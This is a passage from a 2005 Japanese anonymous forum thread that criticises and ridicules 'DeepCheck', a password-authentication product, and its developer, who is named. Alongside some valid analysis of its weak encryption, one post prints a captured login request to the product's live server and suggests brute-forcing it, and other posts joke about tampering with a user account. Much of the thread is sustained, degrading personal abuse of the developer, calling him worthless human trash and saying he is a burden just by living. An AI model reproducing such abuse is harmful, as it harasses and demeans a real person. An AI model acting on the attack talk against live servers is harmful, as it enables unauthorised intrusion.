スライドさせるキーが五つある(そのうち一つが正解)というレベルです。
私の思いつきで書いてしまいましたが、
>>890 の UI と説明のほうがチンコより堅牢でした。
(あ、もちろん
>>890 も既存のものを改善できて*いない*という点ではチンコ互換です)
なので、
>>890 はチンコの概要ではなく、チンコ UI の概要ということで。誤解を招いて申し訳ない。
あの説明ではチンコよりましなものができてしまいます。
902 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 16:10:45
ああああああああ
概要じゃねえや概念だ。スパイウェア対策として見た目五倍になっているってだけの。
うーん、そこだけ切り出そうとしてもどうしてもチンコ並みにクソなものが思いつかない。
>>890 と
>>896 の説明はチンコの概要ではありません。撤回します。
これではチンコより多少は使いやすくてチンコより堅牢なものができてしまいます。
もちろん既存のものを下回るというチンコの特徴は残っていますが、チンコほどクソではありません。
誤解を招くようなものを提示してしまいました。すいません('A`)
>>900 なるほど、正しいパスワード以外に4つの文字列を入れさせるのはキーロガー対策のため「だけ」であって、
認証リクエストを構成する要素は、
今回のパスワード
次回のパスワード
カーソル位置
の3つだけであるということですか。
「次回のパスワードをくっつけて送る」というのが目新しいといえばいえますかね?
シーザー暗号の部分は、他の強力な暗号方式に代えるとして。
904 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 16:31:35
>>903 いえいえ。チンコ最大の弱点が「次回パスをくっつける」部分なのです。
なぜか?
次回パスをくっつける、ということは、一方向ハッシュが使えないという事です。
つまり、双方向の暗号しか使えません。暗号文から平文に復号できるものです。
この時点で、一般的な UNIX ログインを下回ります。
BASIC認証と大差ない強度です。つまり、通信経路の暗号化以外に生きる道はありません。
なので、シーザー暗号の部分は強化できません。一方向ハッシュのように「スニフされてもわりと平気」
とはいかないのです。
目新しい、というより、クソなので誰も使わなかった方法でしかないのです。
905 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 16:33:39
暗号化で問題が出るだけではありません。 連結して入力させているため、「新パスワードの確認入力」といったインターフェィスが実装できません。 つまり、ユーザは入力時に「新パスワード」を確実に記憶またはメモしなければなりません。 カーソル位置を必死に追う事になるでしょう。しかも、一文字入力するたびに次の文字を探し・・・ 記憶することに集中すらできません。 チンコチェックはチンコチェックであること自体が弱点といってもいいくらい、弱点しか存在していないのです。
906 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 16:37:02
ああああ、それだけではないや。 入力時に記憶しづらいだけでなく、確認入力がないため間違いに気づきにくい UI になります。 しかも「パスがあっていて次回パスでミスった」とき、次回ログインができません。 気づくのはログインしてからです。しかもログイン時にパスを変更するため、ログアウトしないと パスが変更できず・・・そう、ワンミスでアカウントが死にます。 確認入力ができるインターフェイスがログイン後に提供され、そこでパスを変更する場合、 ミスったことにその場で気づくために対応ができますが、チンコチェックではこれらが実装できないのです。 チンコチェックを使うと、全体が腐っていってしまうのです。 もはや害悪でしかありません。
>>904-905 >次回パスをくっつける、ということは、一方向ハッシュが使えないという事です。
なるほど〜すごくためになります。
目新しいけど、メリットはなんだろう? セッション追跡ができることかなと思っていたところでした。
>目新しい、というより、クソなので誰も使わなかった方法でしかないのです。
了解です。
>連結して入力させているため、「新パスワードの確認入力」といったインターフェィスが実装できません。
こちらはよくわかりませんでした。実際に触ったことがないからかも。
908 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 16:56:07
>>907 確認入力は絶対できないってもんでもないかもです。俺もダメだなあ。
通常はパスワードを新規決めたり変更する際に
新しいパスワードの入力[__________]
パスワードの確認入力[__________]
って感じで、おなじパスを二回入力させます。
チンコの場合、これができません。ひとつの入力欄で現在パスと次回パスを連続入力させているからです。
チンコの場合では現在パスから連続入力することになってしまいます。それを我慢できればOKですな。
しかし、チンコではマウスオペレーションで入力先が固定なので面倒かもです。フォーカスのある欄に、と
言いたくても、入力時に「文字入力ボタン」を押してしまうため現実的ではありません。
ラジオボタンで選択、などとやりだすと・・・想像したくもないUIになりそうです。
あるいは次回パスをニ連続で入れさせる・・そうすると双方向暗号の弱点から同じパターンが繰返され、
暗号文をキャプチャするだけで次回パスを判別できるようになってしまいます。
実装できないってのは言い過ぎたようですが、現実的ではないのは間違いなさそうです。
株式会社:セクースふぉー プロダクツ:チンコちぇっく 嫌な会社だなw
DeepCheckって名前はいかにも誇大広告だよなぁ いつでもいっしょ とか またコンボね とかに改名したほうがいい希ガス
911 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 17:37:56
そういや誰かが「CheapCheck」って言ってたなあ。 チープチェック 確かにチープ 新英和中辞典 第6版 (研究社) cheap 1a (普通の値段・実際の価値などと比較してより)安い,安価な (⇒→inexpensive 【比較】) b (店など)安売りの; 安物売りの c 《英》 割引の 2a 安っぽい,とるにたらない,つまらない ~~~~~~~~~~~~~~~ b 見下げ果てた,軽蔑すべき,低俗な ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
送出しているリクエストって
http://deepcheck.x-fer.co.jp:8084/noiselet?opcodeStr=ninsyo&accountID=ura&hMypassword=21,22,23,24,25,26,27,28&pattrnStr=20,9,13,14,2&cliantTypeStr=ajax で(実際はPOSTしてるんですけどGETでも通る)
とにかく今回パスワードと次回パスワードの区切りがわかればこれっておわり?
pattrnStrってのは最後の文字を決めた時点のカーソルの位置みたいですが
正規にリクエストしていけばいいのかなあと。
これってブルートフォースで何とかなりそうですね。
その前にサーバが落ちるんでしょうけど。
思わず吹き出してしまった。いや〜長々、ご苦労さんでした。これくらいの講釈となると、やはり、なんですかねー、ググっただけでは書けない? 最後に、グサリといかがでしょう。 ura のカーソル行番号を変えちまいましょう。すれば、 uramotyもグーの音も出ませんぜ。 >株式会社:セクースふぉー >プロダクツ:チンコちぇっく 社名も製品名もかえるんじゃないでしょうか〜。
1000 は、オイラようにしてくださいね。 皆様に感謝の言葉を書きの期したいので。 おねがいしますよっ。
>>913 (ura のカーソル行番号を変えちまいましょう)++
916 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 18:50:51
>>913 だからuraのキャプチャデータを晒せと何万回言われた?
晒すとおまえ自身が吐いたんだぞ?
破られているのは破られている。チンコチェックはすでに二ヶ月前から死んでいる。
グサっと・・?ケッ
お前が言っているのと同じ勝負をしてやろう。
浦本。お前がチンコチェックが必要だと妄想してしまうパスワード認証である俺のホットメールアカウントを
クラックしてみせろ。
今からアカウントをとる。そのアカウントをクラックできれば、一般的な認証に問題があると認めてやろう。
お前とおなじ土俵の勝負だ。まさか、逃げないだろうな?
917 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 19:01:20
さあ取ったぞ浦本。
貴様の勝負ルールがいかに腐ったものかわかるはずだ。
[email protected] このアカウントをクラックしろ。それがuraアカウントクラックと同種のチャレンジだ。
たった今俺が作成した。
腐れハゲ!貴様のルールだ。やってみせろ!
これで貴様が俺のアカウントをクラックできないなら、そもそもDeepCheckは
必 要 な い
ということになる。さっさとうせろヴォケ!
既存のものに問題があるというならその問題をついて攻略してみな。
下書きフォルダにメッセージを残してやる。それを書けたら認めてやろう。
できなかったら、貴様の提唱した既存の認証の問題点は「嘘っぱち」だ。おまえは嘘つきだ。
お前のやりはじめたルールだからな。逃げんなよ。
本当かどうか確認してみな。メールを出してみろ。 その本文をコピペしてやる。 さあ、浦本。おまえのやりかたが正しいなら、お前のルールに則ったこの勝負 や れ る は ず だ よ な ? ちなみに、俺のアカウントであるからパスクラをしても不正アクセスにはならない。 証明はするぜ。誰かメールしてみな。 その本文をコピペできたら、俺のアカウントだっていう証明になる。 俺は浦本と違ってそのへんの手続きはシッカリやるからな。 メールは証拠に使える。お前が出したメールを俺がコピペすることで証拠になる。 さあ、やってみろ浦本。俺はお前と違って逃げも隠れもしないぞ?
ただしホットメールのサーバに迷惑はかけんなよ。俺の管理外だからな。 既存の認証に問題があるとしたのは浦本だ。その問題点を付け。 できるんだろ?問題があるんだろ?やってみろ。 お前のルールだ。 お前が言い出したルールだ。 これがクリアできない限り、お前はウソツキだ。 嘘吐きの浦本。さあやってみろ。 逃げるなよ卑怯者。お前がやり始めたんだからな。
それともお前が土下座して謝罪しているのをサイトトップに載せたら、 これまでの俺に対する誹謗中傷を許してやってもいいぞ。 選べ。 お前のルールで俺のアカウントをクラックするか、できるわけがないから嘘吐きのままでいるか、 キッチリ詫びを入れてスレ住人含めmemoやJavaHouse、しらふ氏、その他大勢の方々に許しを請うか。 ああ、もうひとつ。 思わず吹き出すくらい俺の論がおかしいというなら、さあ論破しろ。 無能のお前にできるのならな。それともまた逃げるか? どうせ人間のクズの浦本はまた詭弁を弄して俺のアカウントクラックに手も出さず逃げ出し、 俺の論に反論すらできず妄想にヒキコモって責任転嫁を行うんだろ。クズだからな。 逃げずに立ち向かってみろ。どうせ無能だから人たちも浴びせられず砕け散るのが関の山だけどな。
下書きフォルダにクラック証明用のテキストを置いた。 さあ浦本。お前の言う問題点をついて俺のアカウントの下書きフォルダを見てみろ。 できるわけがないよな。 そういうルールだからな。 な、卑怯者の浦本。逃げたらお前のルールがクソだって証拠になるぜ。 なんたって、「ルールを決めた奴が逃げ出すくらいに卑怯なルール」ってことだからな。
そうそう、もちろん俺は浦本のルールでやるぜ。 いくらでも後付けでルールは変更させてもらう。 お前がやったことだからな、卑怯者の浦本。 さあ、下書きフォルダに一通だけあるメール、コピペしてもらおうか。 できるわけねえよな。こんなクソルールじゃあ。 卑怯者の浦本、お前のルールだ。お前が従わないなら、お前のルールに誰も従わない。 詭弁を弄して逃げるなら、お前のルールがクソだって証拠だ。 チンコチェックがチンコだってことはもう明らかだ。さあ、この勝負がフェアでないなら、お前のルールが フェアでないって証拠でもある。 さあ、直近のキャプチャデータを晒すか、諦めて詫びを入れるか選べ。 どちらでもないなら逃げたということだ。また逃げたら浦本勝久は性根の底までクズ野郎だ。 人生やり直して来い。お前の人生に価値はない。 うんこ製造マシーンとして無駄に生きてきたのでなかったら、さあ選べ。 詫びるか?それとも・・・・・
さて、どうせ浦本のことだからなんだかんだ言って逃げるんだろう。人間のクズだからな。 逃げないんだったら浦本ルールで俺のアカウントをクラックするまでは俺の勝ちのはずだ。 いいねえこれ。勝手に勝利宣言さえ出しておけばいいんだから。楽なもんだ。 キッチリ証拠になる形でサーバのクラック許可を出すか?それならまあマシだな。クズには変わりないが。 それとも約束どおりキャプチャデータを出すか?できやしねえよな。もう破られてるんだから。 どちらもできるわけねえな。卑怯者の浦本には。引退がかかってるもんな。 仕事が全くない会社でも持っていれば経営者を名乗れる。事実上の無職でも肩書きのない無職よりは マシだから手放せないよな。おなじ無職でも経営者のほうが見た目がいいもんな。しょーもない。 それとも浦本の言い分が正しいと証明するために俺の論を論破するか。 できるわけねえよな、無能の浦本には。自分の間違いが間違いだとすら認識できない無能だからな。 人間のクズで卑怯者で無能。 さあ、この事実を覆せるかな?覆し方をもう一度書いてやろう。 ・逃げなければまずクズを撤回してやろう。俺のアカウントを浦本ルールでクラックできたら 既存の認証の問題点とやらを聞いてやろう。 あるいは浦本の間違いを全て認めろ。そうすれば、クズは撤回してやろう。 ・約束を全て履行しろ。そうしたら卑怯者を撤回してやろう。 ・浦本の言い分が正しいと証明しろ。それができたら無能は撤回してやろう。 浦本。お前は俺の足元にも及ばない。なにもかもがだ。 違うというならそれを証明してみせろ。せいぜい年齢くらいだろうが。俺を上回れているのは。 お前が吐いた誹謗中傷、まだ何一つ詫びを入れてはいないねえ。さ、どうしてくれるんだい? この手の奴は指摘者が呆れて黙ったら「言い返せなくなった」と脳内変換して勝利宣言するからな。 実際そうだろ。すでにコテンパンになったチンコチェックでまだ勝利宣言を続けている。そういう奴なんだ、浦本は。 最後の一本が産毛でも生えているうちはハゲじゃないと言い続けるようなもんだね。ハゲだってのに。
トサカに来たみたいでんな。
2つを使い分けて書いてたのに、
>>915 以降同じホストからの post 。
やはり精神的なものはこたえるんだな。
---
>>925 で、そうやってまた逃げるわけか。お前のルールだぞ。
こっちはキッチリと問題点を指摘してやってその態度。 俺は聖人君主じゃないんでね。仏様なら 「浦本だって生きている」 とお許しになるだろうが、世間様はそうはいかない。 今現在浦本が無職で仕事がないってのが証拠だ。 誰にも信用されず、誰にも相手にされない。 お前、家族にも嫌われてるだろ。
っと、言い訳や泣き言はいいから早くお前のルールで俺のアカウントをクラックしてみな。 できなかったら、お前のルールがクソだって証明になる。わかってるのか? お前はお前が間違っていないことをこれで示さなければならない。 できるわけねえけどな。浦本が間違っているんだから。
あ、そうそう。同一ホストからじゃないんだよねこれが。 浦本はいっつも幻覚しかみないからホント困るなあ。
☆ チン マチクタビレタ〜 マチクタビレタ〜 ☆ チン 〃 ∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ヽ ___\(\・∀・) < キャプチャデータまだ〜? \_/⊂ ⊂_ ) \_____________ / ̄ ̄ ̄ ̄ ̄ ̄ /| | ̄ ̄ ̄ ̄ ̄ ̄ ̄| | | 愛媛みかん |/
もういいから次スレ立てないで終了させろ。
おまいらこんなクズに踊らされすぎだよ。
>>864-874 なんてのはためにはなるが浦本を喜ばせてるだけ。愚の骨頂。
まぁどうせ本人が立てるだろうが。
>>931 さん、あたってる。でも自分じゃたてないよ。
>>932 自分で言い出したことだから約束は守れよ
☆ チン マチクタビレタ〜
マチクタビレタ〜
☆ チン 〃 ∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
ヽ ___\(\・∀・) < キャプチャデータまだ〜?
\_/⊂ ⊂_ ) \_____________
/ ̄ ̄ ̄ ̄ ̄ ̄ /|
| ̄ ̄ ̄ ̄ ̄ ̄ ̄| |
| 愛媛みかん |/
>>875-879 >>916-924
935 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 20:46:43
しかし人として腐ってるな こんなに堂々と卑怯な奴は滅多にいないぞ
知識だけではダメだが知識がないのは話にならん。
浦本、お前のことだ。お前には知識だけでなく常識も誠意も人としてあるべきものが何もない。
自分で言い出したことだから約束は守れよ
☆ チン マチクタビレタ〜
マチクタビレタ〜
☆ チン 〃 ∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
ヽ ___\(\・∀・) < キャプチャデータまだ〜?
\_/⊂ ⊂_ ) \_____________
/ ̄ ̄ ̄ ̄ ̄ ̄ /|
| ̄ ̄ ̄ ̄ ̄ ̄ ̄| |
| 愛媛みかん |/
>>875-879 >>916-924
>>932 お前は全て「バズワード」しか使っていないじゃないか。
正しい「専門用語」を使ってもいないお前がよく言えたもんだな。
自分で言い出したことだから約束は守れよ
☆ チン マチクタビレタ〜
マチクタビレタ〜
☆ チン 〃 ∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
ヽ ___\(\・∀・) < キャプチャデータまだ〜?
\_/⊂ ⊂_ ) \_____________
/ ̄ ̄ ̄ ̄ ̄ ̄ /|
| ̄ ̄ ̄ ̄ ̄ ̄ ̄| |
| 愛媛みかん |/
>>875-879 >>916-924
>>935 人を文章だけで操ろうとするやつを何人も見てきた。
君が煽動するたびに人心は離れる。
教科書の知識を並べ立てても、そんなことくらい、少しググれば誰でも知り得る。
字間を読みなさい。
文字では洗わせない事が五万とある。
ひとつでも自分の手で作れば、文章がいかにいい加減なものか気づく。
では。
>>931 どうせ浦本には理解できない範疇なんで、スレの住人向けに
たまにはセキュリティ板らしいことでもと思ったのです('A`)
案の定、浦本には難しすぎてついてこれなかったようですが。
さて、埋めますか。
950あたりから1000取り合戦になるのかな/
>>938 クソしか作れなかった人生を抱きしめて氏ね
ハゲがいくら虚勢をはろうと、
[email protected] さん、あなたの勝ちであることは万人がわかっていますよ。
このハゲをまともに相手にしないほうがいいです、人間の屑ですから。
ただ暇つぶし程度にティンコチェックを分析して遊びましょう。
ティンコチェックは糞ですが、少なくとも嘘はつきませんから。
一度良心を捨てた屑は、二度と更正するとこはないです。
このハゲはそのたぐいの輩です。断言します。
あの、ブルートフォースしてみたいんですけど… やっぱりサーバーが落ちたりIPアドレスが晒されたりするんでしょうか。 それにしてもuramotyさんは誰にこれを売ろうと思っているのか知りませんが 自分の都合の悪い質問に答えない今の姿勢を改めない限り 誰にも売れないと思いますけどね。 DeepCheckをアピールして売ることが 最終的な目的なんじゃないんですか?
やぁ、浦本以外のみんな、InternetWeek2005のmemoBoFいってきた。 すげー面白かった。目からうろこが何枚もとれたし、勉強になったよ。 比較的前の席に座っていたんで、神々が間近に見られてちょっと舞い上がっちゃった。 テヘ。 それでな浦本、スパイウェアに強い、なんてのはもう売りでも何でも ないから。時代はそんなところでとまってないから。 あんたんとこのCheapcheckに金出すくらいだったら、俺はIronport買う。 いや、むしろ俺がシステム構築するわ。既存のもので。たぶん、それでも Cheapcheckより256倍強固なシステムができるよ。
俺もBoFだけでも出ればよかったかなー。 でもiExpo行ってきたんだよねー。それだけで今日はくたくただった。。。
そんな言うほど面白かったっけ。 星澤のなんて相変わらず流用プレゼンだし。 こんなフィッシングがあります。って紹介だけされてもなー。
場当たり的な思いつきしかできないね。 そのおかげで、なんの証明もできないことをバカにされてるのに悔しくないのかね? 多分地図が読めないよこのおじさん。
>>943 いいなあ。いいなあ。うらやましいなあ。
よかったらどんなのが紹介されてたか教えてよ。
>>945 ほしざわさんにつたえておきます('A`)
>>943 0 は何倍しても 0 にしかならないよ…
浦本っさん、まだ就職決まらないの? なにやってんの。
950ゲット。 潰れろ糞(な人物の)スレ
どうみても浦本の惨敗です。 本当にありがとうございました。
左側、頭髪薄いぞ! なにやってんの!?
オイラ、いろいろ書いてんの一人だと思うんだよね。 やけに感情的になってるけど、無記名で書いてても、痛いとこ書かれるとカッカくるんだって事は、よくわかった。 以後、気をつけるよ。 乱暴な展開でもあるな。 これだけDeepCheckを論破したとかいてんだから、あれこれいわず、キャプチャも要求せず、一般のクラッカーと同じ条件で ura カーソル行番号変更をやることぐらい、朝飯前と違うの? どこの世界に自分のサーバやシステムを破ると思われてる情報を出すバカがいるのでしょう。 出すと、相手をバカにした事に等しいじゃないかな。 ま、もうすぐ、サーブレットへのリクエストをリアルタイムで晒す体験サイトを公開しますので、 よろしかったら、覗いてください。 蛇足ですが、今の体験サイトを一度も覗いてないで、あれこれ書いてる方もいらっしゃいますが、 これって、単に、ハヤシタテを目的に参加している訳ですか、暇なんですね。
浦本さんの CheapChecker って(似非)OTP ぐらいしか 売りがないんでしょ。 それだったらふつうのベイシック認証かけてあるサーヴァーで > キャプチャも要求せず、一般のクラッカーと同じ条件で > ura カーソル行番号変更をやることぐらい、朝飯前と違うの? これ破って見ろ、っていってるのと全然かわんないじゃん。
こんなクズ相手になに必死になってんの? 藪パソ並みのへぼだから、もう放置しようよ。 こんな糞認証システム見破れないで導入して(いないと思うが)、 損害受けたって馬鹿が存在したってそれは自己責任。 Webで取り上げたメディアにはこのスレのアドレス送っとけば良いでしょ。
>>953 > これだけDeepCheckを論破したとかいてんだから、あれこれいわず、キャプチャも要求せず、一般のクラッカーと同じ条件で
> ura カーソル行番号変更をやることぐらい、朝飯前と違うの?
大馬鹿??
普通のクラッカー(スクリプトキディとかは除く)はシステムのもっとも弱いところから攻める。
例えば、ソーシャルエンジニアリング的手法を使って内部から攻めたりな。
で、DeepCheckは、パケット盗聴にすごく弱い。
当然クラッカーはパケットをなんとか盗聴しようとするだろう。
なんでかっていうと、そっちの方が簡単な場合が多いから。
従ってだ、「一般のクラッカーと同じ条件」ってことを強調するなら、
パケットデータが盗聴されてるってことは前提にしなきゃならんわけだ。
これでもまだわからないかな、浦本君?
>>953 ブルートフォースアタックすりゃ、いつかは破れるに決まってるだろう。
おまえはやっぱり馬鹿だな〜〜〜( ´,_ゝ`)プッ
浦本、早くこの質問に答えてよ。
>>85 > また、セキュリティ=暗号の高度化と思い込んだ人がいかに多いか、はっきりしただけでも、nemo への
> 投稿は意味があった。
「セキュリティ=暗号の高度化」が問題ならば、その問題点と影響を具体的に例示すること。
前にも言ったんだけど、無視されたんだよな。
浦本、早くこの質問に答えてよ。
>>85 > また、セキュリティ=暗号の高度化と思い込んだ人がいかに多いか、はっきりしただけでも、nemo への
> 投稿は意味があった。
「セキュリティ=暗号の高度化」が問題ならば、その問題点と影響を具体的に例示すること。
前にも言ったんだけど、無視されたんだよな。
浦本、早くこの質問に答えてよ。
>>85 > また、セキュリティ=暗号の高度化と思い込んだ人がいかに多いか、はっきりしただけでも、nemo への
> 投稿は意味があった。
「セキュリティ=暗号の高度化」が問題ならば、その問題点と影響を具体的に例示すること。
前にも言ったんだけど、無視されたんだよな。
>>953 >オイラ、いろいろ書いてんの一人だと思うんだよね。
さすが、浦本脳。
自分の都合の悪いことは妄想で補うんですね!!
それで、DeepCheck+のリリースはまだですか?
>>913 >思わず吹き出してしまった。いや〜長々、ご苦労さんでした。これくらいの講釈となると、やはり、なんですかねー、ググっただけでは書けない?
これをみて俺はつくづく浦本って人間はクズなんだと再認識した。
浦本の全ての言動って、「俺はスレ住人より賢い」という思いこみが根底にあるようだな。
「スレ住人」じゃなくて、「他の全ての人間」かもしれないが。
まぁ、そんなんだから仕事ないんだろうな。
あと、浦本は「無知の知」を知れ。
>>962 さん
すみませ〜ん、おまたせしとります〜。
もうじきもうじきですから。
なんとかみなさんにご理解していただこうと苦心しとりますー。
来週にはなんとかだせるようやっとりますけー、もう少し、堪忍しておくれやすー。
>>964 期限守れないような人間は信頼されない=仕事がない
>>964 おい、浦本。早くこの質問に答えろ。
お前がどういう思想でDeepCheck作ったのか知りたい。
それとも、思いつきで作っちゃったから答えられないのか?
>>85 > また、セキュリティ=暗号の高度化と思い込んだ人がいかに多いか、はっきりしただけでも、nemo への
> 投稿は意味があった。
「セキュリティ=暗号の高度化」が問題ならば、その問題点と影響を具体的に例示すること。
前にも言ったんだけど、無視されたんだよな。
>>953 > これだけDeepCheckを論破したとかいてんだから、あれこれいわず、キャプチャも要求せず、一般のクラッカーと同じ条件で
> ura カーソル行番号変更をやることぐらい、朝飯前と違うの?
えーっと、スパイウェアに強いと言っていたのはあなた自身ではなかったでしょ
うかね。論破の重要なポイントはクライアント側への攻撃に弱すぎるってこと
ですからね。
>
>>315 > DeepCheck+では、DeepCheckのどの問題点がどういうふうに解決されているんですか?
浦本のルールはまだ浦本が守ってくれません。
自分で言い出したことだから約束は守れよ
☆ チン マチクタビレタ〜
マチクタビレタ〜
☆ チン 〃 ∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
ヽ ___\(\・∀・) < キャプチャデータまだ〜?
\_/⊂ ⊂_ ) \_____________
/ ̄ ̄ ̄ ̄ ̄ ̄ /|
| ̄ ̄ ̄ ̄ ̄ ̄ ̄| |
| 愛媛みかん |/
>>875-879 >>916-924 前スレより
77 名前: uramoty [
[email protected] ] 投稿日: 2005/10/29(土) 13:26:06
>>76 さん
28 か。連続してスニッファしても、全然大丈夫なんだ。
皆さんの楽しみは遺してあげたいし。
引っ越しが完了し、安定したら、クラ---->サバのリクエスト、公開するよ。
このハゲは嘘を平気でつける、まともに相手にする価値のない人間の屑。 ただ暇つぶし程度にティンコチェックを分析して遊びましょう。 ティンコチェックは糞ですが、少なくとも嘘はつきませんから。 一度良心を捨てた屑は、二度と更正することはないです。 このハゲはそのたぐいの輩であると、ここに断言します。
>>953 >これだけDeepCheckを論破したとかいてんだから、あれこれいわず、キャプチャも要求せず、一般のクラッカーと同じ条件で
ura カーソル行番号変更をやることぐらい、朝飯前と違うの?
やってみようとしたんだけどサーバーが落ちるからなあ(ワラ
それがクラッキング対策っていうんじゃないだろうなあ、uramotyさんよ。
しかもIP晒されるみたいだし。
ていうか都合の悪い質問答えなさすぎ。
>>953 >ura カーソル行番号変更をやることぐらい、朝飯前と違うの?
ura_cursor++
> ま、もうすぐ、サーブレットへのリクエストをリアルタイムで晒す体験サイトを公開しますので、
無意味
> どこの世界に自分のサーバやシステムを破ると思われてる情報を出すバカがいるのでしょう。
破られたと自覚してるんだね
>>964 お前が変な方言と伸ばす音(ー、〜)を多用して文章書く時は
虚勢を張ってる時だと思うのだが、あってるか?
あと20数レスでおしまい。次スレも無い。
このスレがなくなると、もう誰もまともに相手してくれないだろうから
途中で送ってしまった(´・ω・`) このスレがなくなると、もう誰もまともに相手してくれないだろうから 残りのスレを大切にしろよ
途中で送ってしまった(´・ω・`) このスレがなくなると、もう誰もまともに相手してくれないだろうから 残りのスレを大切にしろよ
そうだな。もう次スレ必要ないしな。 いいか浦本、かまって欲しいなら、自分で立てるんだぞ?
あれ?二重送信orz
くぁwsでfrgtyふじこlp;
>>913 > 思わず吹き出してしまった。いや〜長々、ご苦労さんでした。これくらいの講釈となると、やはり、なんですかねー、ググっただけでは書けない?
言うに事欠いて、この返事。
性格腐りすぎ。
おい、浦本。早くこの質問に答えろ。
お前がどういう思想でDeepCheck作ったのか知りたい。
それとも、思いつきで作っちゃったから答えられないのか?
>>85 > また、セキュリティ=暗号の高度化と思い込んだ人がいかに多いか、はっきりしただけでも、nemo への
> 投稿は意味があった。
「セキュリティ=暗号の高度化」が問題ならば、その問題点と影響を具体的に例示すること。
前にも言ったんだけど、無視されたんだよな。
↑うちのぬこが書き込んだ うちのぬこは浦本よりおりこうだよ 学習能力あるし、答えたくなくないであろう質問にも答えてくれる 浦本、残り少ないスレでお前が出来る最善のことは質問に答えるということだ あと謝罪もね
_ .. _ / \ /, '⌒ l.r‐-、.`、 / ( 八 ) ヽ ( ー-' `ー-' ノ ー┐ (_八_)┌-' `ー┐┌┘ -======' ,=====- -====' ,=====- -==' ,==- ______ ,r-‐┘└-‐、_______
誤爆したwww
ごめんなさい、うちのぬこが書いたのは
>>977
〃〃∩ _, ,_ ⊂⌒( `Д´) < DeepCheck破っちゃヤダヤダ `ヽ_つ ⊂ノ ジタバタ ↑浦本
+ . .. :.... .. .. . + .. . .. . +.. .. :.. __ .. .|: | .|: | .(二二X二二O |: | ..:+ .. ∧∧ |: | /⌒ヽ),_|; |,_,, さようなら _,_,_,_,,〜(,, );;;;:;:;;;;:::ヽ,、 DeepCheck(+含む)のことは忘れない・・・ "" """""""",, ""/; 安らかに眠れ "" ,,, """ ""/:;; "" ,,""""" /;;;::;;
DeepCheck+では、DeepCheckのどの問題点がどういうふうに解決されているんですか? DeepCheck+では、DeepCheckのどの問題点がどういうふうに解決されているんですか? DeepCheck+では、DeepCheckのどの問題点がどういうふうに解決されているんですか? DeepCheck+では、DeepCheckのどの問題点がどういうふうに解決されているんですか? DeepCheck+では、DeepCheckのどの問題点がどういうふうに解決されているんですか? DeepCheck+では、DeepCheckのどの問題点がどういうふうに解決されているんですか? DeepCheck+では、DeepCheckのどの問題点がどういうふうに解決されているんですか? DeepCheck+では、DeepCheckのどの問題点がどういうふうに解決されているんですか? DeepCheck+では、DeepCheckのどの問題点がどういうふうに解決されているんですか?
DeepCheckは売れていません!!!!!! あちゃーーーーーーーー(>_<)
DeepCheckは理論的な考察がなされていません!!!!!! あちゃーーーーーーーー(>_<)
次スレは立てるなよ
ここの住人ともいよいよお別れか・・・
<このスレッドをWebのキャッシュで見る未来の方へ> この投稿を書いている現在までにDeepCheckという似非セキュリティシステムは完全に論理的に破られていました。 当スレッドの過去の投稿を見てもらえれば分かりますが、DeepCheckは信じられないほど幼稚なシステムでした。 もしこのシステムを導入したユーザがいたとしたならば彼らは多大な損害を受けたでしょう。 その観点からいうと、このシステムは犯罪の温床とも言えました。 この犯罪的システムを作り上げ、世に蔓延させようとした男は愚かな初老の日本人でした。 あなたがこの投稿を見ている時代、彼が生きているかはわかりません。 ですが、私は楽観視しております。当システムを導入したユーザは皆無だと確信しているからです。 過去、その愚かな初老男が存在したことをあなたは知りもしないでしょう。 ですが、その事こそがあなたの時代まで世界が平和であったことの証明なのです。
>>990 >愚かな初老の日本人
愚かというか「嘘つきの屑」という印象でした。私のなかでは。
馬鹿だから、常に嘘をつかないと生きていけなかったのか?
ずっと嘘ばかりついてきたから、馬鹿になってしまったのか?
おそらく両方でしょうが、広告屋という職業も多少関係あるかもしれません。
>>760 と
>>796 を見ると、まともにリリース文も読めてない。
あれで広告を打てるとは思えんよ。
広告屋というのもそもそも嘘なんじゃね?
広告業界にいたかもしれないけど、よくて原稿受け取りのパシリだろ。
広告屋としての経験を積んでいたらまず間違いなく誤植はしないし。
広告屋であの文章、役に立たないどころの騒ぎじゃないよ。
結局、何をやってもだめなやつはダメってことだ。
浦本は所詮浦本、うんこ製造機として無駄にカロリー消費してるだけだ。
浦本のせいでどれだけの税金が無駄になって、どれだけの食料が無駄になって、
どれだけの水が無駄になって、どれだけのエネルギーが無駄になったか。
生きてるだけで迷惑な奴だよ。
DeepCheckが、2006年3月末までに東証一部上場企業に正式採用されるかどうか。 これでDeepCheckの成否を判断してやろう。 採用されれば浦本さんの勝ち。 採用されなければ、浦本さんの負け。 大事なのは、「実際にまともな企業に採用されるのかどうか」だ。 これが世の中のゆるぎない客観的な評価ってやつだ。 ま、がんばってくれたまえw
SPAM屋も広告業
>>914 >1000 は、オイラようにしてくださいね。
やだwww
必死でリロードしまくってんのかなwww
このスレもあと残りわずか!!w
浦本さん、間に合うかっ!
浦本寝てる?
999 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 23:48:51
